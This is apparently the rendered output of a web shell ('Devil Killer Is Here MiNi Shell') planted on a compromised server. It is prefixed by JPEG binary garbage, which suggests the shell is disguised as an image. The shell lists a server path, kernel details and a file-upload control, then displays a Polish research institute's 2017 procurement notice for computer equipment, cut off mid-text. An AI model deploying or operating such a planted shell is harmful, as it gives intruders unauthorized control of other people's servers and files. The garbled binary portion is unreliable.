JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170522/512234-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 512234-N-2017 z dnia 2017-05-22 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Instytut Fizyki Molekularnej PAN</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Sukcesywne dostawy sprzętu i oprogramowania komputerowego oraz sprzętu RTV</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii"></span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy"></span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Instytut Fizyki Molekularnej PAN</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">55799000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Mariana Smoluchowskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">17</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">60179 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Poznań</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">618 695 100</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">office@ifmpan.poznan.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">618 684 524</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ifmpan.poznan.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytut Naukowy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.ifmpan.poznan.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.ifmpan.poznan.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć w fomie pisemnej w języku polskim, w nienaruszonym opakowaniu z napisem: ,,Oferta w postępowaniu nr PN/1/2017 - nie otwierać przed 30 maja 2017 roku, godz. 10:30". Na kopercie należy podać nazwę i dokładny adres wraz z numerami telefonów Wykonawcy</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Instytut Fizyki Molekularnej Polskiej Akademii Nauk, ul. M. Smoluchowskiego 17, 60-179 Poznań, pokój nr 119 lub 116</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Sukcesywne dostawy sprzętu i oprogramowania komputerowego oraz sprzętu RTV</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PN/1/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">7</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest sukcesywna dostawa sprzętu i oprogramowania komputerowego oraz sprzętu RTV do siedziby Zamawiającego. Szczegółowy opis przedmiotu zamówienia w podziale na części, w tym opis grup asortymentowych, zakres ilościowy oraz szczegółowe specyfikacje przedmiotów w ramach każdej z grup asortymentowych zostały zawarte w SIWZ oraz Załączniku nr 1 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30200000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30211000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30232110-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30216110-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48900000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30231300-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30233132-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30233180-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>38000000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>38652120-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32324600-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">6</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej: - dla części 1 zamówienia - dwie dostawy sprzętu komputerowego o wartości minimum 40 000,00 zł brutto każda, - dla części 4 zamówienia - dwie dostawy sprzętu komputerowego o wartości minimum 15 000,00 zł brutto każda, - dla części 5 zamówienia - dwie dostawy sprzętu komputerowego o wartości minimum 7 000,00 zł brutto każda,Dla części 2, 3, 6 i 7 Zamawiający nie precyzuje warunku.Uwaga: w przypadku składania oferty na więcej niż jedną część zamówienia spośród części 1, 4, 5 dopuszcza się wykazanie dwóch dostaw, przy czym każda o wartości wynikającej z sumy wartości wymaganych dla tych części, na które Wykonawca składa ofertę.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Dotyczy części 1, 4 i 5:Zamawiający zgodnie z art. 26 ust. 2 ustawy Pzp wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia oświadczeń i dokumentów potwierdzających spełnianie warunku udziału w postępowaniu, o którym mowa w punkcie V.1.2 SIWZ, tj. wykazu dostaw wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane należycie. Wartość i przedmiot wymaganych dostaw został określony w punkcie V.1.2 SIWZ.W przypadku złożenia przez Wykonawców wykazu dostaw, który będzie zawierał kwoty wyrażone w walutach innych niż PLN, Zamawiający dokona przeliczenia przyjmując średni kurs Narodowego Banku Polskiego (NBP) obowiązujący w dniu wszczęcia postępowania o udzielenie zamówienia.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">1. Dotyczy części 2: Wykonawca składając ofertę na część 2 zamówienia w formularzu oferty dla każdego oferowanego urządzenia podaje koszt wydruku obliczony zgodnie z informacją zawartą w Załączniku nr 1, na podstawie danych pobranych ze strony centrumdruku.com.pl lub na podstawie strony producenta urządzenia lub na podstawie średniej ceny 5 najtańszych ofert z jednej z porównywarek cen (skapiec.pl, ceneo.pl). Zamawiający zgodnie z art. 26 ust. 2 ustawy Pzp wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni dokumentów potwierdzających spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, tj. wydruku ze strony centrumdruku.com.pl, strony producenta urządzenia lub ze strony porównywarki internetowej, 